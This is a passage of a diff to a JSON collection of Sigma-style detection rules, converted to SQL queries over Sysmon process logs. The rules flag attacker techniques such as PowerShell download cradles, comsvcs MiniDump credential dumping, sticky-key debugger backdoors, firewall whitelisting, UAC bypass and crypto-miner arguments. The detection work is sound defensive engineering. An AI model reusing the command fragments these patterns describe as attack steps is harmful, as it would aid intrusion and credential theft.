the .NET InstallUtil.exe application in order to execute image without log", + "author": "frack113", "tags": [ - "attack.t1218", "attack.defense_evasion" ], "falsepositives": [ - "The process spawned by vsjitdebugger.exe is uncommon." + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\vsjitdebugger.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\vsimmersiveactivatehelper%.exe' ESCAPE '\\' OR Image LIKE '%\\\\devenv.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\InstallUtil.exe' ESCAPE '\\' AND Image LIKE '%Microsoft.NET\\\\Framework%' ESCAPE '\\' AND CommandLine LIKE '%/logfile= %' ESCAPE '\\' AND CommandLine LIKE '%/LogToConsole=false%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_use_of_vsjitdebugger_bin.yml" + "filename": "proc_creation_win_instalutil_no_log_execution.yml" }, { - "title": "Active Directory Structure Export Via Csvde.EXE", - "id": "e5d36acd-acb4-4c6f-a13f-9eb203d50099", + "title": "HackTool - SharpLDAPmonitor Execution", + "id": "9f8fc146-1d1a-4dbf-b8fd-dfae15e08541", "status": "experimental", - "description": "Detects the execution of \"csvde.exe\" in order to export organizational Active Directory structure.", + "description": "Detects execution of the SharpLDAPmonitor. Which can monitor the creation, deletion and changes to LDAP objects.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration" + "attack.discovery" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\csvde.exe' ESCAPE '\\' OR OriginalFileName = 'csvde.exe') AND CommandLine LIKE '% -f%' ESCAPE '\\') AND NOT ((CommandLine LIKE '% -i%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\SharpLDAPmonitor.exe' ESCAPE '\\' OR OriginalFileName = 'SharpLDAPmonitor.exe') OR (CommandLine LIKE '%/user:%' ESCAPE '\\' AND CommandLine LIKE '%/pass:%' ESCAPE '\\' AND CommandLine LIKE '%/dcip:%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_csvde_export.yml" + "filename": "proc_creation_win_hktl_sharp_ldap_monitor.yml" }, { - "title": "DirLister Execution", - "id": "b4dc61f5-6cce-468e-a608-b48b469feaa2", + "title": "Greedy File Deletion Using Del", + "id": "204b17ae-4007-471b-917b-b917b315c5db", "status": "experimental", - "description": "Detect the usage of \"DirLister.exe\" a utility for quickly listing folder or drive contents. It was seen used by BlackCat ransomware to create a list of accessible directories and files.", + "description": "Detects execution of the \"del\" builtin command to remove files using greedy/wildcard expression. This is often used by malware to delete content of folders that perhaps contains the initial malware infection or to delete evidence.", "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1083" + "attack.defense_evasion", + "attack.t1070.004" ], "falsepositives": [ - "Legitimate use by users" + "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'DirLister.exe' OR Image LIKE '%\\\\dirlister.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%del %' ESCAPE '\\' OR CommandLine LIKE '%erase %' ESCAPE '\\') AND (CommandLine LIKE '%\\\\\\*.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\\\*.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_dirlister_execution.yml" + "filename": "proc_creation_win_cmd_del_greedy_deletion.yml" }, { - "title": "Potential SystemNightmare Exploitation Attempt", - "id": "c01f7bd6-0c1d-47aa-9c61-187b91273a16", + "title": "PowerShell Download Pattern", + "id": "3b6ab547-8ec2-4991-b9d2-2b06702a48d7", "status": "test", - "description": "Detects an exploitation attempt of SystemNightmare in order to obtain a shell as LOCAL_SYSTEM", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a Powershell process that contains download commands in its command line string", + "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", "tags": [ - "attack.privilege_escalation", - "attack.t1068" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%printnightmare.gentilkiwi.com%' ESCAPE '\\' OR CommandLine LIKE '% /user:gentilguest %' ESCAPE '\\' OR CommandLine LIKE '%Kiwi Legit Printer%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%new-object%' ESCAPE '\\' AND CommandLine LIKE '%net.webclient).%' ESCAPE '\\' AND CommandLine LIKE '%download%' ESCAPE '\\' AND (CommandLine LIKE '%string(%' ESCAPE '\\' OR CommandLine LIKE '%file(%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_other_systemnightmare.yml" + "filename": "proc_creation_win_powershell_download_patterns.yml" }, { - "title": "Suspicious Ping/Del Command Combination", - "id": "54786ddc-5b8a-11ed-9b6a-0242ac120002", + "title": "Hermetic Wiper TG Process Patterns", + "id": "2f974656-6d83-4059-bbdf-68ac5403422f", "status": "experimental", - "description": "Detects a method often used by ransomware. Which combines the \"ping\" to wait a couple of seconds and then \"del\" to delete the file in question. Its used to hide the file responsible for the initial infection for example", - "author": "Ilya Krestinichev", - "tags": [ - "attack.defense_evasion", - "attack.t1070.004" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -n %' ESCAPE '\\' OR CommandLine LIKE '% /n %' ESCAPE '\\') AND CommandLine LIKE '%Nul%' ESCAPE '\\' AND (CommandLine LIKE '% /f %' ESCAPE '\\' OR CommandLine LIKE '% -f %' ESCAPE '\\' OR CommandLine LIKE '% /q %' ESCAPE '\\' OR CommandLine LIKE '% -q %' ESCAPE '\\') AND CommandLine LIKE '%ping%' ESCAPE '\\' AND CommandLine LIKE '%del %' ESCAPE '\\')" - ], - "filename": "proc_creation_win_cmd_ping_del_combined_execution.yml" - }, - { - "title": "Potential RDP Tunneling Via SSH Plink", - "id": "f38ce0b9-5e97-4b47-a211-7dc8d8b871da", - "status": "test", - "description": "Execution of plink to perform data exfiltration and tunneling", + "description": "Detects process execution patterns found in intrusions related to the Hermetic Wiper malware attacks against Ukraine in February 2022", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1572" + "attack.execution", + "attack.lateral_movement", + "attack.t1021.001" ], "falsepositives": [ - "Administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\plink.exe' ESCAPE '\\' AND CommandLine LIKE '%:127.0.0.1:3389%' ESCAPE '\\') OR (Image LIKE '%\\\\plink.exe' ESCAPE '\\' AND CommandLine LIKE '%:3389%' ESCAPE '\\' AND (CommandLine LIKE '% -P 443%' ESCAPE '\\' OR CommandLine LIKE '% -P 22%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\policydefinitions\\\\postgresql.exe' ESCAPE '\\' OR (CommandLine LIKE '%CSIDL\\_SYSTEM\\_DRIVE\\\\temp\\\\sys.tmp%' ESCAPE '\\' OR CommandLine LIKE '% 1> \\\\\\\\127.0.0.1\\\\ADMIN$\\\\\\_\\_16%' ESCAPE '\\') OR (CommandLine LIKE '%powershell -c %' ESCAPE '\\' AND CommandLine LIKE '%\\\\comsvcs.dll MiniDump %' ESCAPE '\\' AND CommandLine LIKE '%\\\\winupd.log full%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_plink_susp_tunneling.yml" + "filename": "proc_creation_win_malware_hermetic_wiper_activity.yml" }, { - "title": "PsExec/PAExec Escalation to LOCAL SYSTEM", - "id": "8834e2f7-6b4b-4f09-8906-d2276470ee23", + "title": "LOLBAS Data Exfiltration by DataSvcUtil.exe", + "id": "e290b10b-1023-4452-a4a9-eb31a9013b3a", "status": "experimental", - "description": "Detects suspicious commandline flags used by PsExec and PAExec to escalate a command line to LOCAL_SYSTEM rights", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects when a user performs data exfiltration by using DataSvcUtil.exe", + "author": "Ialle Teixeira @teixeira0xfffff, Austin Songer @austinsonger", "tags": [ - "attack.resource_development", - "attack.t1587.001" + "attack.exfiltration", + "attack.t1567" ], "falsepositives": [ - "Admins that use PsExec or PAExec to escalate to the SYSTEM account for maintenance purposes (rare)", - "Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension" + "DataSvcUtil.exe being used may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "DataSvcUtil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i -s powershell%' ESCAPE '\\') AND (CommandLine LIKE '%psexec%' ESCAPE '\\' OR CommandLine LIKE '%paexec%' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%/in:%' ESCAPE '\\' OR CommandLine LIKE '%/out:%' ESCAPE '\\' OR CommandLine LIKE '%/uri:%' ESCAPE '\\') AND (Image LIKE '%\\\\DataSvcUtil.exe' ESCAPE '\\' OR OriginalFileName = 'DataSvcUtil.exe'))" ], - "filename": "proc_creation_win_sysinternals_psexec_paexec_escalate_system.yml" + "filename": "proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml" }, { - "title": "WMI Backdoor Exchange Transport Agent", - "id": "797011dc-44f4-4e6f-9f10-a8ceefbe566b", - "status": "test", - "description": "Detects a WMI backdoor in Exchange Transport Agents via WMI event filters", + "title": "Suspicious DumpMinitool Execution", + "id": "eb1c4225-1c23-4241-8dd4-051389fde4ce", + "status": "experimental", + "description": "Detects suspicious ways to use the \"DumpMinitool.exe\" binary", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1546.003" + "attack.defense_evasion", + "attack.t1036", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\EdgeTransport.exe' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\Bin\\\\OleConverter.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\DumpMinitool.exe' ESCAPE '\\' OR Image LIKE '%\\\\DumpMinitool.x86.exe' ESCAPE '\\' OR Image LIKE '%\\\\DumpMinitool.arm64.exe' ESCAPE '\\') OR OriginalFileName IN ('DumpMinitool.exe', 'DumpMinitool.x86.exe', 'DumpMinitool.arm64.exe')) AND ((NOT ((Image LIKE '%\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Extensions\\\\%' ESCAPE '\\')) OR CommandLine LIKE '%.txt%' ESCAPE '\\') OR ((CommandLine LIKE '% Full%' ESCAPE '\\' OR CommandLine LIKE '% Mini%' ESCAPE '\\' OR CommandLine LIKE '% WithHeap%' ESCAPE '\\') AND NOT (CommandLine LIKE '%--dumpType%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_wmi_backdoor_exchange_transport_agent.yml" + "filename": "proc_creation_win_dumpminitool_susp_execution.yml" }, { - "title": "Audit Policy Tampering Via NT Resource Kit Auditpol", - "id": "c6c56ada-612b-42d1-9a29-adad3c5c2c1e", + "title": "Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE", + "id": "a35f5a72-f347-4e36-8895-9869b0d5fc6d", "status": "test", - "description": "Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Netsh command execution that whitelists a program located in a suspicious location in the Windows Firewall", + "author": "Sander Wiebing, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1562.002" + "attack.t1562.004" ], "falsepositives": [ - "The old auditpol utility isn't available by default on recent versions of Windows as it was replaced by a newer version. The FP rate should be very low except for tools that use a similar flag structure" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%/logon:none%' ESCAPE '\\' OR CommandLine LIKE '%/system:none%' ESCAPE '\\' OR CommandLine LIKE '%/sam:none%' ESCAPE '\\' OR CommandLine LIKE '%/privilege:none%' ESCAPE '\\' OR CommandLine LIKE '%/object:none%' ESCAPE '\\' OR CommandLine LIKE '%/process:none%' ESCAPE '\\' OR CommandLine LIKE '%/policy:none%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND ((CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%allowedprogram%' ESCAPE '\\') OR (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%rule%' ESCAPE '\\' AND CommandLine LIKE '%action=allow%' ESCAPE '\\' AND CommandLine LIKE '%program=%' ESCAPE '\\')) AND (CommandLine LIKE '%\\%Public\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%TEMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%TMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\RECYCLER\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\SystemVolumeInformation\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\addins\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\cursors\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\debug\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\drivers\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\fonts\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\help\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\system32\\\\tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Local Settings\\\\Temporary Internet Files\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_auditpol_nt_resource_kit_usage.yml" + "filename": "proc_creation_win_netsh_fw_allow_program_in_susp_location.yml" }, { - "title": "Suspicious Service Binary Directory", - "id": "883faa95-175a-4e22-8181-e5761aeb373c", + "title": "Suspicious Debugger Registration Cmdline", + "id": "ae215552-081e-44c7-805f-be16f975c8a2", "status": "test", - "description": "Detects a service binary running in a suspicious directory", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor).", + "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", "tags": [ - "attack.defense_evasion", - "attack.t1202" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.008" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\$Recycle.bin%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Contacts\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Searches\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\') AND (ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\CurrentVersion\\\\Image File Execution Options\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%sethc.exe%' ESCAPE '\\' OR CommandLine LIKE '%utilman.exe%' ESCAPE '\\' OR CommandLine LIKE '%osk.exe%' ESCAPE '\\' OR CommandLine LIKE '%magnify.exe%' ESCAPE '\\' OR CommandLine LIKE '%narrator.exe%' ESCAPE '\\' OR CommandLine LIKE '%displayswitch.exe%' ESCAPE '\\' OR CommandLine LIKE '%atbroker.exe%' ESCAPE '\\' OR CommandLine LIKE '%HelpPane.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_service_dir.yml" + "filename": "proc_creation_win_registry_install_reg_debugger_backdoor.yml" }, { - "title": "Suspicious Processes Spawned by WinRM", - "id": "5cc2cda8-f261-4d88-a2de-e9e193c86716", + "title": "Powershell Token Obfuscation - Process Creation", + "id": "deb9b646-a508-44ee-b7c9-d8965921c6b6", "status": "experimental", - "description": "Detects suspicious processes including shells spawnd from WinRM host process", - "author": "Andreas Hunkeler (@Karneades), Markus Neis", + "description": "Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation", + "author": "frack113", "tags": [ - "attack.t1190", - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" + "attack.defense_evasion", + "attack.t1027.009" ], "falsepositives": [ - "Legitimate WinRM usage" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsl.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine REGEXP '\\w+`(\\w+|-|.)`[\\w+|\\s]' OR CommandLine REGEXP '\"(\\{\\d\\})+\"\\s*-f' OR CommandLine REGEXP '\\$\\{((e|n|v)*`(e|n|v)*)+:path\\}|\\$\\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\\}|\\$\\{env:((p|a|t|h)*`(p|a|t|h)*)+\\}'))" ], - "filename": "proc_creation_win_winrm_susp_child_process.yml" + "filename": "proc_creation_win_powershell_token_obfuscation.yml" }, { - "title": "Potential Crypto Mining Activity", - "id": "66c3b204-9f88-4d0a-a7f7-8a57d521ca55", - "status": "stable", - "description": "Detects command line parameters or strings often used by crypto miners", - "author": "Florian Roth (Nextron Systems)", + "title": "UAC Bypass Using DismHost", + "id": "853e74f9-9392-4935-ad3b-2e8c040dae86", + "status": "test", + "description": "Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1496" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Legitimate use of crypto miners", - "Some build frameworks" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '% --cpu-priority=%' ESCAPE '\\' OR CommandLine LIKE '%--donate-level=0%' ESCAPE '\\' OR CommandLine LIKE '% -o pool.%' ESCAPE '\\' OR CommandLine LIKE '% --nicehash%' ESCAPE '\\' OR CommandLine LIKE '% --algo=rx/0 %' ESCAPE '\\' OR CommandLine LIKE '%stratum+tcp://%' ESCAPE '\\' OR CommandLine LIKE '%stratum+udp://%' ESCAPE '\\' OR CommandLine LIKE '%LS1kb25hdGUtbGV2ZWw9%' ESCAPE '\\' OR CommandLine LIKE '%0tZG9uYXRlLWxldmVsP%' ESCAPE '\\' OR CommandLine LIKE '%tLWRvbmF0ZS1sZXZlbD%' ESCAPE '\\' OR CommandLine LIKE '%c3RyYXR1bSt0Y3A6Ly%' ESCAPE '\\' OR CommandLine LIKE '%N0cmF0dW0rdGNwOi8v%' ESCAPE '\\' OR CommandLine LIKE '%zdHJhdHVtK3RjcDovL%' ESCAPE '\\' OR CommandLine LIKE '%c3RyYXR1bSt1ZHA6Ly%' ESCAPE '\\' OR CommandLine LIKE '%N0cmF0dW0rdWRwOi8v%' ESCAPE '\\' OR CommandLine LIKE '%zdHJhdHVtK3VkcDovL%' ESCAPE '\\') AND NOT ((CommandLine LIKE '% pool.c %' ESCAPE '\\' OR CommandLine LIKE '% pool.o %' ESCAPE '\\' OR CommandLine LIKE '%gcc -%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\DismHost.exe%' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_susp_crypto_mining_monero.yml" + "filename": "proc_creation_win_uac_bypass_dismhost.yml" }, { - "title": "Potential CommandLine Path Traversal Via Cmd.EXE", - "id": "087790e3-3287-436c-bccf-cbd0184a7db1", - "status": "test", - "description": "Detects potential path traversal attempt via cmd.exe. Could indicate possible command/argument confusion/hijacking", - "author": "xknow @xknow_infosec, Tim Shelton", + "title": "Lolbin Defaultpack.exe Use As Proxy", + "id": "b2309017-4235-44fe-b5af-b15363011957", + "status": "experimental", + "description": "Detect usage of the \"defaultpack.exe\" binary as a proxy to launch other programs", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.003" + "attack.t1218", + "attack.defense_evasion", + "attack.execution" ], "falsepositives": [ - "Java tools are known to produce false-positive when loading libraries" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'cmd.exe') AND ((ParentCommandLine LIKE '%/c%' ESCAPE '\\' OR ParentCommandLine LIKE '%/k%' ESCAPE '\\' OR ParentCommandLine LIKE '%/r%' ESCAPE '\\') OR (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/k%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\')) AND (ParentCommandLine = '/../../' OR CommandLine LIKE '%/../../%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%\\\\Tasktop\\\\keycloak\\\\bin\\\\/../../jre\\\\bin\\\\java%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\defaultpack.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmd_path_traversal.yml" + "filename": "proc_creation_win_lolbin_defaultpack.yml" }, { - "title": "Ping Hex IP", - "id": "1a0d4aba-7668-4365-9ce4-6d79ab088dfd", - "status": "test", - "description": "Detects a ping command that uses a hex encoded IP address", - "author": "Florian Roth (Nextron Systems)", + "title": "Regasm/Regsvcs Suspicious Execution", + "id": "cc368ed0-2411-45dc-a222-510ace303cb2", + "status": "experimental", + "description": "Detects suspicious execution of Regasm/Regsvcs utilities", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1140", - "attack.t1027" + "attack.t1218.009" ], "falsepositives": [ - "Unlikely, because no sane admin pings IP addresses in a hexadecimal form" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\ping.exe' ESCAPE '\\' AND CommandLine LIKE '%0x%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((Image LIKE '%\\\\Regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\Regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RegSvcs.exe', 'RegAsm.exe')) AND (CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine 